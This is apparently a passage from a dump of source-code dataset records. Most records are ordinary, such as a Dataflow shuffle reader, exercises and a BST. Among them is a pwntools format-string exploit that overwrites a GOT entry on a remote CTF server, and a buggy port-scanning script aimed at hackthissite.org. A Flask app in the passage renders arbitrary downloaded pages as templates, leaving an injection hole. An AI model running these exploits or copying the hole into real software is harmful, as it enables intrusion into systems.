During normal execution\n when reading the position is always there.\n\n Returns:\n A fully initialized shuffle entry read from the StringIO stream.\n \"\"\"\n if with_position:\n position_length = struct.unpack('>I', stream.read(4))\n position = stream.read(position_length[0])\n else:\n position = None\n key_length = struct.unpack('>I', stream.read(4))\n key = stream.read(key_length[0])\n secondary_key_length = struct.unpack('>I', stream.read(4))\n secondary_key = stream.read(secondary_key_length[0])\n value_length = struct.unpack('>I', stream.read(4))\n value = stream.read(value_length[0])\n return ShuffleEntry(key, secondary_key, value, position)\n\n\nclass ShuffleEntriesIterable(object):\n \"\"\"An iterable over all entries between two positions filtered by key.\n\n The method can be used to iterate over all values in the shuffle if key is\n None and start and nd positions are ''.\n \"\"\"\n\n def __init__(self, reader, start_position='', end_position='', key=None):\n \"\"\"Constructs an iterable for reading sequentially entries in a range.\n\n The iterable object can be used to get all the shuffle entries associated\n with a key (repeatedly) or simply iterating over all entries (if key is\n None).\n\n Args:\n reader: A shuffle reader object. These are shared among all iterables\n since there are networking costs associated to setting one up.\n start_position: The first shuffle position to read from.\n end_position: The shuffle position where reading will stop.\n key: The key to match for all shuffle entries if not None. The iteration\n stops when a record with a different key is encountered.\n\n \"\"\"\n self.reader = reader\n self.start_position = start_position\n self.end_position = end_position\n self.key = key\n self._pushed_back_entry = None\n\n def push_back(self, entry):\n \"\"\"Pushes back one entry to support simple look ahead scenarios.\"\"\"\n if self._pushed_back_entry is not None:\n raise RuntimeError('There is already an entry pushed back.')\n self._pushed_back_entry = entry\n\n def __iter__(self):\n last_chunk_seen = False\n start_position = self.start_position\n end_position = self.end_position\n while not last_chunk_seen:\n chunk, next_position = self.reader.Read(start_position, end_position)\n if not next_position: # An empty string signals the last chunk.\n last_chunk_seen = True\n # Yield records inside the chunk just read.\n read_bytes, total_bytes = 0, len(chunk)\n stream = StringIO.StringIO(chunk)\n while read_bytes < total_bytes:\n entry = ShuffleEntry.from_stream(stream)\n if self.key is not None and self.key != entry.key:\n return\n read_bytes += entry.size\n yield entry\n # Check if anything was pushed back. We do this until there is no\n # value pushed back since it is quite possible to have values pushed\n # back multiple times by the upper callers.\n while self._pushed_back_entry is not None:\n to_return, self._pushed_back_entry = self._pushed_back_entry, None\n yield to_return\n # Move on to the next chunk.\n start_position = next_position\n\n\nclass ShuffleEntriesIterator(object):\n \"\"\"An iterator object for a ShuffleEntryIterable with push back support.\n\n The class supports also the iterable protocol (__iter__) and it is careful\n to not create a new iterator from the underlying iterable when iter() is\n called. 
This is important because shuffle entries iterators are passed\n around and we want to keep reading sequentially while the passing happens.\n More specifically they are kept as the underlying iterators for the key values\n iterables returned for each key.\n \"\"\"\n\n def __init__(self, iterable):\n self.iterable = iterable\n self.iterator = iter(self.iterable)\n\n def __iter__(self):\n return self\n\n def push_back(self, entry):\n self.iterable.push_back(entry)\n\n def next(self):\n return next(self.iterator)\n\n def clone(self, start_position, end_position, key):\n \"\"\"Clones the current iterator with a new key, start, and end position.\"\"\"\n return ShuffleEntriesIterator(\n ShuffleEntriesIterable(\n self.iterable.reader, start_position, end_position, key))\n\n\nclass ShuffleKeyValuesIterable(observable.ObservableMixin):\n \"\"\"An iterable over all values associated with a key.\n\n The class supports reiteration over the values by cloning the underlying\n iterables every time __iter__ gets called. This way the values can be\n reiterated. The first time __iter__ is called no cloning happens.\n This supports the very common case of going once over all values for all keys.\n \"\"\"\n\n def __init__(self, entries_iterator, key, value_coder,\n start_position, end_position=''):\n super(ShuffleKeyValuesIterable, self).__init__()\n self.key = key\n self.value_coder = value_coder\n self.start_position = start_position\n self.end_position = end_position\n self.entries_iterator = entries_iterator\n self.first_values_iterator = None\n\n def __iter__(self):\n if self.first_values_iterator is None:\n # We safe the first values iterator returned because upper layers\n # can use it to drain the values in it. This is an optimization needed\n # to make efficient the very common case of iterating over all key values\n # available.\n self.first_values_iterator = self.values_iterator()\n return self.first_values_iterator\n else:\n # If this is not the first time __iter__ is called we will clone the\n # underlying iterables so that we can reiterate as many times as we\n # want over the key's values.\n return ShuffleKeyValuesIterable(\n self.entries_iterator.clone(\n self.start_position, self.end_position, self.key),\n self.key, self.value_coder,\n self.start_position, self.end_position).values_iterator()\n\n def values_iterator(self):\n for entry in self.entries_iterator:\n if self.key != entry.key:\n # Remember the end_position so that if we reiterate over the values\n # we can do that without reading too much beyond the key.\n self.end_position = entry.position\n self.entries_iterator.push_back(entry)\n break\n decoded_value = self.value_coder.decode(entry.value)\n self.notify_observers(entry.value, is_encoded=True)\n yield decoded_value\n\n def __str__(self):\n return '<%s>' % self._str_internal()\n\n def __repr__(self):\n return '<%s at %s>' % (self._str_internal(), hex(id(self)))\n\n def _str_internal(self):\n return '%s on %s' % (self.__class__.__name__, self.key)\n\n\nclass ShuffleReaderBase(iobase.NativeSourceReader):\n \"\"\"A base class for grouped and ungrouped shuffle readers.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n self.source = shuffle_source\n self.reader = reader\n self.entries_iterable = None\n self.key_coder = self.source.key_coder.get_impl()\n self.value_coder = self.source.value_coder.get_impl()\n\n def __enter__(self):\n if self.reader is None:\n self.reader = shuffle_client.PyShuffleReader(\n _shuffle_decode(self.source.config_bytes))\n # Initialize the shuffle 
entries iterable. For now we read from start to\n # end which is enough for plain GroupByKey operations.\n if self.entries_iterable is None:\n self.entries_iterable = ShuffleEntriesIterable(\n self.reader, self.source.start_position, self.source.end_position)\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n\nclass GroupedShuffleReader(ShuffleReaderBase):\n \"\"\"A shuffle reader providing grouped reading.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n super(GroupedShuffleReader, self).__init__(shuffle_source, reader)\n self._range_tracker = range_trackers.GroupedShuffleRangeTracker(\n decoded_start_pos=shuffle_source.start_position,\n decoded_stop_pos=shuffle_source.end_position)\n\n def __iter__(self):\n entries_iterator = ShuffleEntriesIterator(self.entries_iterable)\n for entry in entries_iterator:\n entries_iterator.push_back(entry)\n key_values = ShuffleKeyValuesIterable(\n entries_iterator,\n entry.key, self.value_coder, entry.position)\n group_start = entry.position\n\n last_group_start = self._range_tracker.last_group_start()\n is_at_split_point = (\n last_group_start is None or group_start != last_group_start)\n\n if is_at_split_point:\n if not self._range_tracker.try_claim(group_start):\n # If an end position is defined, reader has read all records up to the\n # defined end position, otherwise, reader has read all records of the\n # source.\n return\n else:\n self._range_tracker.set_current_position(group_start)\n\n yield (self.key_coder.decode(entry.key), key_values)\n # We need to drain the iterator returned just in case this\n # was not done by the caller. Otherwise we will not properly advance\n # to the next key but rather return the next entry for the current\n # key (if there are multiple values).\n drain_iterator = key_values.first_values_iterator\n if drain_iterator is None:\n drain_iterator = iter(key_values)\n for _ in drain_iterator:\n pass\n\n def get_progress(self):\n last_group_start = self._range_tracker.last_group_start()\n if last_group_start is None:\n return None\n reader_position = iobase.ReaderPosition(\n shuffle_position=base64.urlsafe_b64encode(last_group_start))\n return iobase.ReaderProgress(position=reader_position)\n\n def request_dynamic_split(self, dynamic_split_request):\n assert dynamic_split_request is not None\n split_request_progress = dynamic_split_request.progress\n if split_request_progress.position is None:\n logging.warning('GroupingShuffleReader only supports split at a Position.'\n ' Requested: %r', dynamic_split_request)\n return\n encoded_shuffle_position = split_request_progress.position.shuffle_position\n if encoded_shuffle_position is None:\n logging.warning('GroupingShuffleReader only supports split at a shuffle'\n ' position. 
Requested: %r'\n , split_request_progress.position)\n return\n\n if self._range_tracker.try_split(_shuffle_decode(encoded_shuffle_position)):\n logging.info('Split GroupedShuffleReader at %s', encoded_shuffle_position)\n split_position = iobase.ReaderPosition(\n shuffle_position=encoded_shuffle_position)\n return iobase.DynamicSplitResultWithPosition(split_position)\n else:\n logging.info('Refusing to split GroupedShuffleReader %r at %s'\n , self, encoded_shuffle_position)\n\n\nclass UngroupedShuffleReader(ShuffleReaderBase):\n \"\"\"A shuffle reader providing ungrouped reading.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n super(UngroupedShuffleReader, self).__init__(shuffle_source, reader)\n\n def __iter__(self):\n for entry in self.entries_iterable:\n yield self.value_coder.decode(entry.value)\n\n\nclass ShuffleSourceBase(iobase.NativeSource):\n \"\"\"A base class for grouped and ungrouped shuffle sources.\"\"\"\n\n def __init__(self, config_bytes, coder, start_position='', end_position=''):\n self.config_bytes = config_bytes\n self.key_coder, self.value_coder = (\n coder if isinstance(coder, tuple) else (coder, coder))\n self.start_position = (start_position if not start_position\n else _shuffle_decode(start_position))\n self.end_position = (end_position if not end_position\n else _shuffle_decode(end_position))\n\n\nclass GroupedShuffleSource(ShuffleSourceBase):\n \"\"\"A source that reads from a shuffled dataset and yields key-grouped data.\n\n The value for each key will be an iterable object that will yield values.\n \"\"\"\n\n def reader(self, test_reader=None):\n return GroupedShuffleReader(self, reader=test_reader)\n\n\nclass UngroupedShuffleSource(ShuffleSourceBase):\n \"\"\"A source that reads from a shuffled dataset and yields values.\n\n This source will drop the keys of the key-value pairs and yield just the\n values. 
This source is used in resharding operations.\n \"\"\"\n\n def reader(self, test_reader=None):\n return UngroupedShuffleReader(self, reader=test_reader)\n\n\nclass ShuffleSinkWriter(iobase.NativeSinkWriter):\n \"\"\"A sink writer for ShuffleSink.\"\"\"\n\n def __init__(self, shuffle_sink, writer=None):\n self.sink = shuffle_sink\n self.writer = writer\n self.stream = StringIO.StringIO()\n self.bytes_buffered = 0\n self.key_coder = self.sink.key_coder.get_impl()\n self.value_coder = self.sink.value_coder.get_impl()\n\n def __enter__(self):\n if self.writer is None:\n self.writer = shuffle_client.PyShuffleWriter(\n _shuffle_decode(self.sink.config_bytes))\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n value = self.stream.getvalue()\n if value:\n self.writer.Write(value)\n self.bytes_buffered = 0\n self.stream.close()\n self.writer.Close()\n\n def Write(self, key, secondary_key, value):\n entry = ShuffleEntry(\n self.key_coder.encode(key),\n secondary_key,\n self.value_coder.encode(value),\n position=None)\n entry.to_bytes(self.stream, with_position=False)\n self.bytes_buffered += entry.size\n if self.bytes_buffered > 10 << 20:\n self.writer.Write(self.stream.getvalue())\n self.stream.close()\n self.stream = StringIO.StringIO()\n self.bytes_buffered = 0\n\n\nclass ShuffleSink(iobase.NativeSink):\n \"\"\"A sink that writes to a shuffled dataset.\"\"\"\n\n def __init__(self, config_bytes, coder):\n self.config_bytes = config_bytes\n self.key_coder, self.value_coder = (\n coder if isinstance(coder, tuple) else (coder, coder))\n\n def writer(self, test_writer=None):\n return ShuffleSinkWriter(self, writer=test_writer)\n","sub_path":"google/cloud/dataflow/worker/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"551656437","text":"\"\"\"\nChecks for failing tests from the API\n\"\"\"\n\nimport logging\nimport asyncio\nimport requests\nimport pendulum\n\n\ndef check_tests(\n loop, check_tests_delay, storage, slack_client, api_url, slack_message_template\n): # pylint: disable-msg=too-many-arguments\n \"\"\"\n Check tests and send a slack message to the user when some tracked tests failed\n \"\"\"\n logging.info(\"Check tests results\")\n loop.call_later(\n check_tests_delay, check_tests, loop, check_tests_delay, storage, slack_client, api_url, slack_message_template\n )\n end = pendulum.now(\"UTC\")\n start = pendulum.now(\"UTC\").subtract(hours=24)\n response = requests.get(\n api_url,\n params={\"test_status\": \"failed\", \"start\": start.to_iso8601_string(), \"end\": end.to_iso8601_string()},\n headers={\"accept\": \"application/json\"},\n )\n storage[\"clean_expired_tracks\"]()\n tracks = storage[\"load_all_tracked_tests\"]()\n\n if \"tests\" not in response.json():\n logging.warning(\"Invalid JSON from api call. Does not contain a tests field.\")\n return\n\n for test in response.json()[\"tests\"]:\n full_name = test[\"full_name\"]\n count = test[\"count\"]\n for track in tracks:\n if full_name != track[\"test\"]:\n continue\n asyncio.wait([send_track(track, count, check_tests_delay, slack_client, slack_message_template)])\n\n\ndef send_track(track, count, check_tests_delay, client, slack_message_template):\n \"\"\"\n Send slack message\n \"\"\"\n logging.info(\"Sending message to client. 
USER: %s, TEST: %s FAILED\", track[\"user\"], track[\"test\"])\n slack_message = slack_message_template if slack_message_template is not None else \"\"\n slack_message = slack_message.replace(\"{{test}}\", track[\"test\"])\n slack_message = slack_message.replace(\"{{count}}\", str(count))\n slack_message = slack_message.replace(\n \"{{period}}\",\n pendulum.period(pendulum.now(\"UTC\").subtract(seconds=check_tests_delay), pendulum.now(\"UTC\")).in_words(),\n )\n return client.chat_postMessage(channel=track[\"channel_id\"], text=slack_message, thread_ts=track[\"thread_ts\"])\n","sub_path":"ebr_trackerbot/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"30248179","text":"i = input()\ni = i.split(' ')\nA = int(i[0])\nB = int(i[1])\nC = int(i[2])\nD = int(i[3])\nif((B > C) and (D > A) and \n ((C + D) > (A + B)) and \n (C > 0) and (D > 0) and\n (A % 2 == 0)):\n print(\"Valores aceitos\")\nelse:\n print(\"Valores nao aceitos\")\n","sub_path":"solutions/uri/1035.py","file_name":"1035.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382502942","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\ncounts=dict()\nwords=list()\nhandle = open(name)\nfor line in handle:\n if not line.startswith('From '): continue\n wor=line.split()\n wor=wor[5]\n wor=float(wor[0:2])\n words.append(wor)\n #print(words)\nfor word in words:\n counts[word]=counts.get(word,0)+1\n#print(sorted([(k,v) for k,v in counts.items()])) This will print as a Tuple\nlst=list()\nfor k,v in counts.items():\n tup=(k,v)\n lst.append(tup)\nlst.sort()\nfor k,v in lst:\n print(k,v)\n","sub_path":"Assignment10.2.py","file_name":"Assignment10.2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221092510","text":"#!/usr/bin/python3\nimport hashlib\n\nimport urllib.request\nfrom flask import Flask, session, redirect, url_for, escape, request, render_template\nimport logging\nimport os\n\nm = hashlib.md5()\n\nbase_template_folder = \"./templates/\"\nbase_template_name = \"index.html\"\n\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\n\nheaders = {'User-Agent': user_agent, }\n\napp = Flask(__name__)\n\n# Set the secret key to some random bytes. Keep this really secret!\napp.secret_key = b'_5#32L\"F4Q8z\\n\\xec]/'\n\ndata = []\n@app.route('/')\ndef index():\n return redirect(url_for('informe_o_site'))\n\n\n@app.route('/informe_o_site', methods=['GET', 'POST'])\ndef informe_o_site():\n\n if request.method == 'POST':\n if request.form['urltounlock'] != \"\":\n session['urltounlock'] = request.form['urltounlock']\n if os.path.isfile(base_template_folder + base_template_name):\n print(\"File found, deleting\")\n os.remove(base_template_folder + base_template_name)\n return redirect(url_for('dothejob'))\n\n return '''\n
    <form method=post>\n
    Informe a URL do site\n
    <input type=text name=urltounlock>\n
    <input type=submit>\n
    </form>\n
    \n '''\n\n\ndef download_site(download_url, save_as):\n if not os.path.isfile(save_as):\n assembled_request = urllib.request.Request(\n download_url, None, headers)\n response = urllib.request.urlopen(assembled_request)\n data = response.read()\n\n index_fd = open(save_as, \"w\")\n index_fd.write(data.decode(\"utf-8\"))\n index_fd.close()\n\n\n@app.route('/dothejob')\ndef dothejob():\n string_to_test = session['urltounlock'].encode(\"utf-8\")\n print(string_to_test)\n generated_id = hashlib.sha224(string_to_test).hexdigest()\n new_template_name = \"a\" + generated_id + base_template_name\n download_site(session['urltounlock'],\n base_template_folder + new_template_name)\n return render_template(new_template_name)\n\ndef main():\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94678552","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 21 18:05:34 2017\r\n\r\n@author: SteveShaw\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef BTOption(opt_type,S0, K, r, u, T, N=2000,american=\"false\"):\r\n #we improve the previous tree by checking for early exercise for american options\r\n \r\n #calculate delta T \r\n deltaT = float(T) / N\r\n \r\n # up and down factor will be constant for the tree so we calculate outside the loop\r\n u = np.exp(0.3 * np.sqrt(deltaT))\r\n d = 1.0 / u\r\n \r\n #to work with vector we need to init the arrays using numpy\r\n fs = np.asarray([0.0 for i in range(N + 1)])\r\n \r\n #we need the stock tree for calculations of expiration values\r\n fs2 = np.asarray([(S0 * u**j * d**(N - j)) for j in range(N + 1)])\r\n \r\n #we vectorize the strikes as well so the expiration check will be faster\r\n fs3 =np.asarray( [float(K) for i in range(N + 1)])\r\n \r\n \r\n #rates are fixed so the probability of up and down are fixed.\r\n #this is used to make sure the drift is the risk free rate\r\n a = np.exp(r * deltaT)\r\n p = (a - d)/ (u - d)\r\n oneMinusP = 1.0 - p\r\n \r\n \r\n # Compute the leaves, f_{N, j}\r\n if opt_type ==\"C\":\r\n fs[:] = np.maximum(fs2-fs3, 0.0)\r\n else:\r\n fs[:] = np.maximum(-fs2+fs3, 0.0)\r\n \r\n \r\n #calculate backward the option prices\r\n for i in range(N-1, -1, -1):\r\n fs[:-1]=np.exp(-r * deltaT) * (p * fs[1:] + oneMinusP * fs[:-1])\r\n fs2[:]=fs2[:]*u\r\n \r\n if american=='true':\r\n #Simply check if the option is worth more alive or dead\r\n if type ==\"C\":\r\n fs[:]=np.maximum(fs[:],fs2[:]-fs3[:])\r\n else:\r\n fs[:]=np.maximum(fs[:],-fs2[:]+fs3[:])\r\n \r\n # print fs\r\n return fs[0]\r\n \r\nS0 = 100\r\nr=0.02\r\nsigma=0.3\r\nT=0.25\r\nN=15\r\nK = 110\r\n\r\nprc = BTOption('C', S0, K, r, sigma, T, N, 'true')\r\nprint(prc)","sub_path":"Financial_Eng/bin_tree.py","file_name":"bin_tree.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"376598265","text":"import random\n\nNUMBER_OF_DICE = 5\nSIDES = 6\n# The following constants can be used to describe the combination a player has.\nFIVE_OF_A_KIND = 7\nFOUR_OF_A_KIND = 6\nFULL_HOUSE = 5\nSTRAIGHT = 4\nTHREE_OF_A_KIND = 3\nTWO_PAIRS = 2\nPAIR = 1\nNOTHING = 0\nRESULTSTRINGS = [\"no special combination\", \"a pair\", \"two pairs\", \n \"three of a kind\", \"straight\", \"full house\", \n \"four of the kind\", \"five of the kind\"]\n\n\n# The function is used 
to initialize the random number generator.\n\ndef init_dice():\n seednumber = int(input(\"Enter a number to initialize the dice.\\n\"))\n random.seed(seednumber)\n \n \n# The function returns a random number from interval 1-6 to give a \n# result of one throw of a dice.\n \ndef roll_dice():\n return random.randint(1, SIDES)\n\n\n# The function rolls five dice and returns a list containing the figures of \n# the dice as integers.\n\ndef roll_all_dice():\n noppalista = []\n for i in range(NUMBER_OF_DICE):\n noppalista.append(roll_dice())\n return noppalista\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 5 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_five_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 5:\n return True\n return False\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 4 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_four_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 4:\n return True\n return False\n\n \n# The function checks whether the list given as a parameter\n# contains the same integer exactly 3 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_three_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 3:\n return True\n return False\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 2 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_pair(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 2:\n return True\n return False\n\ndef reroll(noppalista):\n print(\"Enter the numbers of the dice to be rerolled separated by a comma\")\n print(\"or an empty line if you do not want to reroll.\")\n mitka_nopat = input()\n if len(mitka_nopat) > 0:\n mitka_nopat1 = mitka_nopat.split(\",\")\n nopat_int = []\n for noppa in mitka_nopat1:\n noppa_lukuna = int(noppa)-1\n nopat_int.append(noppa_lukuna)\n toimiiko = acceptable(nopat_int)\n if toimiiko == True:\n for noppa in nopat_int:\n noppalista[noppa] = random.randint(1, SIDES)\n nopan_luku = noppa +1\n print(\"The new value for dice no {:d} is {:d}.\".format(nopan_luku, noppalista[noppa]))\n if toimiiko == False:\n print(\"The numbers you entered break the rules of the game.\") \n print(\"No dice are rerolled.\")\n return noppalista\ndef acceptable(numberlist):\n i = 0\n a = 0\n while i != len(numberlist):\n if 0 <= numberlist[i] <= 4:\n if i == 0:\n a += 1 \n else: \n erotus = numberlist[i] - numberlist[i-1]\n if erotus != 0:\n a += 1 \n i += 1\n if a == len(numberlist):\n return True\n else:\n return False\ndef has_straight(noppalista):\n q = noppalista[0]\n w = noppalista[1]\n e = noppalista[2]\n r = noppalista[3]\n t = noppalista[4]\n if has_five_of_a_kind(noppalista) == False and has_four_of_a_kind(noppalista) == False and has_three_of_a_kind(noppalista) == False and has_pair(noppalista) == False and q != 6 and w != 6 and e != 6 and r != 6 and t != 6:\n return True\n if has_five_of_a_kind(noppalista) == False and has_four_of_a_kind(noppalista) == False and has_three_of_a_kind(noppalista) == False and has_pair(noppalista) == False and q != 1 and w != 1 and e != 1 and r != 1 and t != 1:\n return True\n else:\n return False\ndef 
has_full_house(noppalista):\n order = sorted(noppalista)\n if order[0] == order[1] == order[2] and order[3] == order[4]:\n return True\n if order[0] == order[1] and order[2] == order[3] == order[4]:\n return True \n else:\n return False\ndef has_two_pairs(noppalista): \n order = sorted(noppalista)\n if order[0] == order[1] and order[2] == order[3]:\n return True\n if order[0] == order[1] and order[3] == order[4]:\n return True\n if order[1] == order[2] and order[3] == order[4]:\n return True\n else:\n return False \ndef check_combination(noppalista): \n if has_five_of_a_kind(noppalista):\n return 7\n if has_four_of_a_kind(noppalista):\n return 6\n if has_full_house(noppalista):\n return 5\n if has_straight(noppalista):\n return 4\n if has_three_of_a_kind(noppalista):\n return 3\n if has_two_pairs(noppalista):\n return 2\n if has_pair(noppalista):\n return 1\n else:\n return 0\ndef main(): \n init_dice() \n noppalista = roll_all_dice()\n print(\"Your turn:\")\n print(\"Your result is\",noppalista)\n \n noppalista = reroll(noppalista)\n \n koneen_tulos=roll_all_dice()\n print(\"Your final result is \",noppalista)\n print(\"The result of the computer is\", koneen_tulos)\n pelaaja = check_combination(noppalista)\n kone = check_combination(koneen_tulos)\n\n if pelaaja == 7:\n print(\"You have five of a kind.\")\n if pelaaja == 6:\n print(\"You have four of a kind.\")\n if pelaaja == 5:\n print(\"You have full house.\")\n if pelaaja == 4:\n print(\"You have straight.\")\n if pelaaja == 3:\n print(\"You have three of a kind.\")\n if pelaaja == 2:\n print(\"You have two pairs.\")\n if pelaaja == 1:\n print(\"You have a pair.\")\n if pelaaja == 0:\n print(\"You have no special combination.\") \n \n if kone == 7:\n print(\"Computer has five of a kind.\")\n if kone == 6:\n print(\"Computer has four of a kind.\")\n if kone == 5:\n print(\"Computer has full house.\")\n if kone == 4:\n print(\"Computer has straight.\")\n if kone == 3:\n print(\"Computer has three of a kind.\")\n if kone == 2:\n print(\"Computer has two pairs.\")\n if kone == 1:\n print(\"Computer has a pair.\")\n \n if kone == 0:\n print(\"Computer has nothing.\")\n \n if pelaaja > kone: \n print(\"You won.\")\n if pelaaja == kone:\n print(\"You tied with computer.\")\n if kone > pelaaja:\n print(\"Computer won.\")\nmain()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"dicepoker.py","file_name":"dicepoker.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151675430","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 19:03:18 2018\n\n@author: ismael\n\"\"\"\n\nimport socket \n\nserver = 'www.hackthissite.org'\nrequest = \"GET / HTTP/1.1\\nHost: \"+server+\"\\n\\n\" # Define a requisição como HTML\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #cria socket tcp indicado em socket.SOCK_STREAM\ns.connect((server,80)) #Conecta ao server pela porta 80 (Porta de Acesso HTML)\ns.send(request.encode()) #envia a requisição\nresultado = s.recv(4096) # recebe resultado\nprint (resultado) # HTTP code 200\n\n############### Item b #########################\n\n\nportas = [20, 21, 22, 25, 53, 110, 443, 8080, 3306, 5001, 5002]\nvalida = True\n\nfor p in portas: \n \n try:\n conecta = s.connect((server,p))\n valida = True\n \n except: \n valida = False\n if valida:\n print(\"A porta {} está aberta, o serviço desta porta é {}\".format(p,socket.getservbyport(p[\"tcp\"])))\n print(\"A porta {} 
está aberta, o serviço desta porta é {}\".format(p,socket.getservbyport(p[\"udp\"])))\n \n","sub_path":"questao_1.py","file_name":"questao_1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"431066963","text":"from pwn import *\nfrom libformatstr import FormatStr\n\n\np = remote(\"problem1.tjctf.org\",8008)\n\n#p = process('./super_secrate')\nelf = ELF('./super_secrate')\nexit_got = elf.got[\"exit\"]\nget_secrate = elf.symbols[\"get_secret\"]\n\ninfo(\"Exit_got is : %x and get_secrate is %x\" , exit_got,get_secrate)\n\np.recvuntil(\"> \")\np.sendline('dredd')\np.recvuntil('> ')\n\n\nf = FormatStr()\nf[exit_got] = get_secrate\noffset = 35\nbuf = \"\"\nbuf += f.payload(offset,0)\np.sendline(buf)\np.recvuntil('> ')\np.sendline('dredd')\np.recv()\np.interactive()\np.wait()\n \n \n \n\n\n","sub_path":"tjctf/secure_secrets/super_secrate.py","file_name":"super_secrate.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"373878642","text":"#!/usr/bin/env python3\n\n\"\"\"Read Octopus Agile price data from an existing SQLite database and update a\n Pimoroni Blinkt! or Inky pHAT display if connected.\"\"\"\n\nfrom inky.eeprom import read_eeprom\nfrom blinkt_updater import update_blinkt\nfrom inky_updater import update_inky\n\nfind_inky = read_eeprom()\n\nif find_inky is None:\n print(\"No Inky found, trying Blinkt!\")\n update_blinkt()\nelse:\n print(\"Trying Inky\")\n update_inky()\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"365693169","text":"\"\"\"\nBinary search trees are a data structure that enforce an ordering over \nthe data they store. That ordering in turn makes it a lot more efficient \nat searching for a particular piece of data in the tree. \n\nThis part of the project comprises two days:\n1. Implement the methods `insert`, `contains`, `get_max`, and `for_each`\n on the BSTNode class.\n2. 
Implement the `in_order_print`, `bft_print`, and `dft_print` methods\n on the BSTNode class.\n\"\"\"\n\n\nclass Queue:\n def __init__(self):\n self.size = 0\n self.storage = []\n\n def __len__(self):\n return self.size\n\n def enqueue(self, value):\n self.size += 1\n self.storage.append(value)\n\n def dequeue(self):\n if self.size == 0:\n return None\n else:\n self.size -= 1\n return self.storage.pop(0)\n\n\nclass Stack:\n def __init__(self):\n self.size = 0\n self.storage = []\n\n def __len__(self):\n return self.size\n\n def push(self, value):\n self.storage.append(value)\n self.size += 1\n\n def pop(self):\n\n if self.size == 0:\n return None\n else:\n self.size -= 1\n return self.storage.pop()\n\n\n\n\nclass BSTNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n # Insert the given value into the tree\n def insert(self, value):\n if value < self.value:\n if self.left is None:\n self.left = BSTNode(value)\n else:\n self.left.insert(value)\n\n elif value >= self.value:\n if self.right is None:\n self.right = BSTNode(value)\n else:\n self.right.insert(value)\n\n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n if self.value == target:\n return True\n if target < self.value:\n if self.left is None:\n return False\n else:\n return self.left.contains(target)\n else:\n if self.right is None:\n return False\n else:\n return self.right.contains(target)\n\n\n\n # Return the maximum value found in the tree\n def get_max(self):\n current = self\n\n # loop down to find the rightmost leaf\n while current.right:\n return current.right.get_max()\n return current.value\n\n\n # Call the function `fn` on the value of each node\n def for_each(self, fn):\n fn(self.value)\n if self.left is not None:\n self.left.for_each(fn)\n if self.right is not None:\n self.right.for_each(fn)\n\n\n # Part 2 -----------------------\n\n # Print all the values in order from low to high\n # Hint: Use a recursive, depth first traversal\n def in_order_print(self, node=None):\n if self is None:\n return\n if self.left is not None:\n self.left.in_order_print()\n print(self.value)\n\n if self.right is not None:\n self.right.in_order_print()\n pass\n\n # Print the value of every node, starting with the given node,\n # in an iterative breadth first traversal\n def bft_print(self, node=None):\n # you should import the queue class from earlier in the week\n # and use that class to implement this method\n # Use a queue to form a \"line\"\n # for the nodes to \"get in\"\n queue = Queue()\n # start by placing the root in the queue\n queue.enqueue(self)\n # need a while loop to iterate\n # what are we checking in the while statement?\n # while length of queue is greater than 0\n while len(queue) > 0:\n # dequeue item from front of queue\n # print that item\n current = queue.dequeue()\n print(current.value)\n # place current item's left node in queue if not None\n if current.left is 